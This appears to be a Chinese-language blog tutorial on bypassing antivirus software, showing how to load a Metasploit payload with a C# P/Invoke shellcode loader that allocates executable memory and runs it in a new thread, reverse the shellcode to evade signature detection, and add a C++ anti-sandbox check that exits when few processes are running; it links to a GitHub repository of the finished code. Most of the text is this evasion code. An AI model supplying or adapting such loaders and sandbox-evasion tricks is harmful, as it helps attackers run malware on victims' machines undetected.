本文将介绍利用反转shellcode的方法来绕过杀软。我们先来生成一个简单的msf的载荷看看:
查看VT情况:
下面我们来用Csharp写一个基本的加载器,代码如下:
using System;
using System.Runtime.InteropServices;
class Program
{
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
static void Main()
{
IntPtr threatHandle = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr parameter = IntPtr.Zero;
byte[] shellcode = new byte[1] { 0xfc };
UInt32 codeAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(codeAddr), shellcode.Length);
threatHandle = CreateThread(0, 0, codeAddr, parameter, 0, ref threadId);
WaitForSingleObject(threatHandle, 0xFFFFFFFF);
return;
}
}
即利用P/Invoke来调用win32 api。
VT情况:
然后我们将shellcode进行反转,再进行加载:
顺便加点反沙箱,比如判断个沙箱进程数目,C++demo如下:
void AntiSimulation()
{
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (INVALID_HANDLE_VALUE == hSnapshot)
{
return;
}
PROCESSENTRY32 pe = { sizeof(pe) };
int procnum = 0;
for (BOOL ret = Process32First(hSnapshot, &pe); ret; ret = Process32Next(hSnapshot, &pe))
{
procnum++;
}
if (procnum <= 40) //判断当前进程是否低于40个,目前见过能模拟最多进程的是WD能模拟39个
{
exit(1);
}
}
这个就见仁见智,自己加入就好了。看下效果:
最后的代码已传至Github(去除了反沙箱):https://github.com/lengjibo/OffenSiveCSharp/tree/master/bypassAV8